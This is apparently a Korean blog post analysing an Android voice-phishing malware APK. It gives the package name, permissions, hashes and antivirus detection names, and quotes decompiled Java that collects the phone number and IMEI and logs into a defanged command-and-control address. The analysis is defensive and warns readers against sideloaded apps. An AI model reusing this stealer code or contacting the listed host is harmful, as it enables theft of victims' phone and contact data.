오늘은 보이스피싱 악성코드인 혼자만봐.apk(2021.03.31)에 대해 글을 적어 보겠습니다. 물론 현명한 분이라면 기본적으로 백신앱(인지도 있는 제품)하고 있는 상태에서 실시간 감시 등을 하는 상태이거나 또는 안드로이드 스마트폰은 기본적으로 외부에서 다운로드 되는 앱 을 설치를 하면 기본적으로 악성코드에 감염되어서 개인정보가 노출될 수가 있다고 경고를 하고 있습니다.
즉 사용자가 외부인 공식 스토어가 아닌 곳에서 다운로드 한 곳은 위험하다고 생각을 하시면 될 것입니다. 일단 해당 악성코드는 악성코드 이름은 다음과 같습니다.
app_name: 사진
package_name: com.uniapp.unidghre902
그리고 악성코드 권한은 다음과 같습니다.
android.permission.ACCESS_NETWORK_STATE
android.permission.ACCESS_WIFI_STATE
android.permission.INTERNET
android.permission.READ_PHONE_STATE
android.permission.READ_CONTACTS
android.permission.READ_SMS
이번 몸캠 악성코드는 일단 권한은 6개로 간단하게 구성이 돼 있는 걸을 확인을 할 수가 있습니다. 그리고 해쉬값은 다음과 같습니다.
파일명: 혼자만봐.apk
크기: 1,347,549 Bytes
C RC32: dc2e4637
MD5:f8976f1c57731b621f43a1c1578f20b6
SHA-1:41836122beae80ea8993df0fea449efdc32fb329
SHA-256:1e4ac37ed8c7b704ae0ac57e1a8b29728fecddb360e84b8e8353e2876202d3ef
입니다.
com.zhongwenmingzi.xuexi.a.e에서는 스마트폰의 IMEI 정보를 훔쳐가기 위한 코드가 있는 것을 볼 수가 있습니다.
public class e {
public static final String a() {
return Build.MODEL + "," + Build.VERSION.RELEASE + "," + Build.VERSION.SDK;
}
public static final String a(Context context) {
String line1Number = ((TelephonyManager) context.getSystemService("phone")).getLine1Number();
if (TextUtils.isEmpty(line1Number)) {
line1Number = c.c(context);
}
return a(line1Number);
}
public static final String a(String str) {
return !TextUtils.isEmpty(str) ? Pattern.compile("[^\\d]").matcher(str).replaceAll("").trim() : str;
}
public static final String b(Context context) {
String deviceId = ((TelephonyManager) context.getSystemService("phone")).getDeviceId();
return TextUtils.isEmpty(deviceId) ? c.d(context) : deviceId;
}
}
그리고 com.zhongwenmingzi.xuexi.d에서는 다음과 같이 해당 보이스 피싱 을 당한 사람들의 개인정보를 수집하기 위해서 간단하게 아이디, 비밀번호가 삽입된 것을 볼 수가 있습니다.
public static String a(Context context) {
String str = null;
StringBuffer stringBuffer = new StringBuffer();
try {
HttpURLConnection httpURLConnection = (HttpURLConnection) new URL("hxxp://107(.)191.61.74:8080/m/login.htm").openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setConnectTimeout(3000);
httpURLConnection.setDoOutput(true);
httpURLConnection.getOutputStream().write("username=?????&password=??????".getBytes());
httpURLConnection.setInstanceFollowRedirects(false);
httpURLConnection.connect();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream(), "UTF-8"));
while (true) {
String readLine = bufferedReader.readLine();
if (readLine == null) {
break;
}
stringBuffer.append(readLine);
stringBuffer.append("\r\n");
}
bufferedReader.close();
List<String> list = (List) httpURLConnection.getHeaderFields().get("Set-Cookie");
if (list == null || list.size() <= 0) {
return null;
}
String str2 = "";
for (String str3 : list) {
if (str3.contains("JSESSIONID")) {
해당 사이트에 로그인하면 해당 악성코드에 당한 사람들의 휴대폰 정보가 나오면 해당 번호를 클릭하면 해당 스마트폰에 저장된 연락처들이 보이는 것을 확인할 수가 있습니다.
일단 개인적인 생각으로는 기본적으로 연락처들을 가져가서 보이스피싱에 이용을 하는 것으로 추측할 수가 있으며 일단 기본적으로 AhnLab-V3: Trojan/Android.SMSstealer.993516, Avast-Mobile:Android:Evo-gen [Trj],McAfee:Artemis!F8976F1C5773, ESET-NOD32:A Variant Of Android/Spy.Vmvol.I, Symantec Mobile Insight:Spyware:MobileSpy등에서는 사전 방역 또는 정식 탐지명으로 악성코드가 탐지되고 있으므로 안드로이드 사용자 분들은 백신앱을 제대로 된 제품을 사용하고 기본적인 보안 수칙을 지키는 것이 안전하게 스마트폰을 사용하는 방법일 것입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
마이크로소프트 윈도우 10 KB5001330,KB5001337 정기 보안 업데이트 (2) | 2021.04.15 |
---|---|
Gmail(지메일)에서 비밀 이메일 보내는 방법 (8) | 2021.04.14 |
Have I Been Pwned 유출 된 Facebook 전화 번호 검색 방법 (2) | 2021.04.09 |
페이스북 계정 개인정보 유출유무 확인 방법 (4) | 2021.04.06 |
윈도우 10 KB5000842 누적 업데이트로 인한 프리징 현상 해결 업데이트 (2) | 2021.04.01 |
SBI 저축은행 사칭 보이스피싱 앱 분석-sbibank.apk(2021.3.28) (4) | 2021.03.30 |
파이어폭스 87.0 보안 업데이트 (0) | 2021.03.25 |
안랩 V3 랜섬웨어 보호폴더 설정 방법 (8) | 2021.03.24 |